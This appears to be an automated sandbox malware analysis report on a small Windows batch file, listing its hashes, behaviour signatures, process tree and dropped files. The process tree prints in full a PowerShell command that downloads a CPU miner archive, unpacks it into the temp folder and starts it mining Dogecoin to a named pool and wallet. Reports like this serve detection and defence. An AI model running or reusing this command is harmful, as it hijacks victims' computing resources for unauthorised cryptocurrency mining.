b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1797s
max time network
1804s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
04/02/2024, 06:17

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	2536	powershell.exe
10	2536	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
460	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
460	cpuminer-sse2.exe
460	cpuminer-sse2.exe
460	cpuminer-sse2.exe
460	cpuminer-sse2.exe
460	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2536	powershell.exe
2536	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2536	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3248 wrote to memory of 2536	3248	cmd.exe	84
PID 3248 wrote to memory of 2536	3248	cmd.exe	84
PID 2536 wrote to memory of 2284	2536	powershell.exe	92
PID 2536 wrote to memory of 2284	2536	powershell.exe	92
PID 2284 wrote to memory of 460	2284	cmd.exe	94
PID 2284 wrote to memory of 460	2284	cmd.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2536
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:460

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x22hstoq.sho.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.3MB

MD5
ae92ae1607370121de8aad62f56c0894

SHA1
20d00dca463de0f207628225410a58c3ce623c43

SHA256
ab635bdd2d55597fe16c1e837505c557d3ad5da3bb544d55020980cd60dd83f8

SHA512
dc69583089492cc0ba20d13d41745c867cf201932f1a83a2f5854e0f5fa90934b29a2cd8adc2530a0e2a98f69ec7780f92fa646e28a321c89b6f2f14a61990d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
870KB

MD5
e5a5a47a9c2334ed2d46fc30a4cf3894

SHA1
f8e8f9a1be59d67966e5be372aafba489e4c2124

SHA256
e3f2142e0a7ccd152e89c6a40b238d18c0033c057747fd38170d5f96919aaf8e

SHA512
7f24271ed67c91de914c513c97dbfc79b23fa1f5c839cb4ec7e14b87663380d6c50eeb4282111c5259f8d0d796b710c45b80f3963b9f4f61057bf3b0cf16ff56

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
766KB

MD5
b2ac3c75f7b4fbece1548869b413db66

SHA1
01f131cad910f021ba25045ebe4fd739f19fb51a

SHA256
f567b877f4e573dcb612ecba324c39b69268e7c2caeb0a2c83baf11b2f077cb9

SHA512
c783f9bd879c17d8afff45c3e7096080034163b018f7b01a2f5fc3f7a6081cf96f0a4f14411518b49796dcf520b93b7cba8b424ed0dff1bea2f5f22772ac812a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
964KB

MD5
d1f5193097f67e6be3e002a7800e8818

SHA1
3af266b66025bb3d695350cf711fe2eddedacd0b

SHA256
1209eeeb6a9709934be9c575be4abef106702e7535aafc4215ee7c4c998a6a23

SHA512
0d779330786e3864fe36c839b8309af4984aa0d45e313136cd0da2ab745d0bb3524cb88fd79ae7693aa2b68cebea1ba9f661265615a12858812f39ada52f844f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
649KB

MD5
68191b85937cde28d4447c074c0168b3

SHA1
c88370ce15949fb301f00f56d76cf459ac8c2aab

SHA256
49c3c4445deb295d489e5e049eb0e45505bf0faed87b4e18b7f6e4a02366f9a3

SHA512
6ef634ffa1e5449ca21736ee7d58b77cc6cbbd8296e389bbe5ff45499f32a7c729f631cd0665a9f47285a9462aa500c0772e63e533ac5816c20c119946813267

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.2MB

MD5
36d11d774ef05e0d5f45c556af917d5c

SHA1
2c55547a57a798a8a926eb757610d83cde2faaff

SHA256
7e0b496359b7b0fa6d4ffac3fe30d061526f4494d6524c1475cba0e5343d4339

SHA512
7ab839de42e7d08026f19be1426eb1d60d386e6b277c6378ce4252177a226c7f8d0777603d88554fcc8481fa2690abd621ad7b954b81fe5734d0ad1159f30082

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
425KB

MD5
f75a09fd3b6d624a7e49f784d13c59f3

SHA1
b5a8bb7f3573e2cf042ff76fcba5feaa3ce589f8

SHA256
95a03a6cbfe596a6c9c83e3b5018ccda1b5b155c8b669480cb77038b9c9042e1

SHA512
f211d976f9c8430258c4b8bfbdba96fdd4ce0b64c158d87b26c171a66b52ea1f85bd91377cad140f544127fcf3f6cb9e73ce7a8905ccf13f10716780181790bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
627KB

MD5
ed43bcb88aaf3da7f63df6253aaca51b

SHA1
65b83e001d5381aec32611da77c19d5a80b1e4bf

SHA256
ba84ae612fb6470222f0df3c068a35e8d8023796015624d800037e98412b020b

SHA512
b78e4380c4b7213c1220cb30fa782d9f6e519e3ef27dbf735b75a1a46a6aa1832df231af3c35c3e8bbbd53277db9d753edb515ce68d94331093195f4ddd29562

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
410KB

MD5
148663097046ad584e2b3eb9a4017ac9

SHA1
ccd4d6dd091e943ba0a7c1b533ce4364e4b82e24

SHA256
a24b49cd3c029b200bd363de614aa82406a9c54fae85a497337f43cddc18c792

SHA512
f04ba3490a482c91962496ccf36ec16654013698123253fcd04997087997b397b82ead0b550c43c5d6ac5ecdd4ed0e097515543ddb43c4066f9878c977931259

Download Submit
memory/460-77-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-82-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-132-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-122-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-117-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-112-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-107-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-97-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-92-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-87-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-76-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/460-73-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/460-75-0x0000000072160000-0x00000000721F8000-memory.dmp

Filesize
608KB

Download
memory/460-72-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/460-74-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2536-14-0x000001EF58C50000-0x000001EF58C60000-memory.dmp

Filesize
64KB

Download
memory/2536-12-0x00007FF885B30000-0x00007FF8865F1000-memory.dmp

Filesize
10.8MB

Download
memory/2536-11-0x000001EF5ACD0000-0x000001EF5ACE0000-memory.dmp

Filesize
64KB

Download
memory/2536-0-0x000001EF5AD70000-0x000001EF5AE02000-memory.dmp

Filesize
584KB

Download
memory/2536-59-0x00007FF885B30000-0x00007FF8865F1000-memory.dmp

Filesize
10.8MB

Download
memory/2536-13-0x000001EF58C50000-0x000001EF58C60000-memory.dmp

Filesize
64KB

Download
memory/2536-6-0x000001EF5AD00000-0x000001EF5AD22000-memory.dmp

Filesize
136KB

Download
memory/2536-15-0x000001EF5B220000-0x000001EF5B32E000-memory.dmp

Filesize
1.1MB

Download
memory/2536-16-0x000001EF5ACE0000-0x000001EF5ACF6000-memory.dmp

Filesize
88KB

Download
memory/2536-17-0x00007FF885B30000-0x00007FF8865F1000-memory.dmp

Filesize
10.8MB

Download
memory/2536-18-0x000001EF58C50000-0x000001EF58C60000-memory.dmp

Filesize
64KB

Download
memory/2536-20-0x000001EF5B180000-0x000001EF5B192000-memory.dmp

Filesize
72KB

Download
memory/2536-21-0x000001EF5B160000-0x000001EF5B16A000-memory.dmp

Filesize
40KB

Download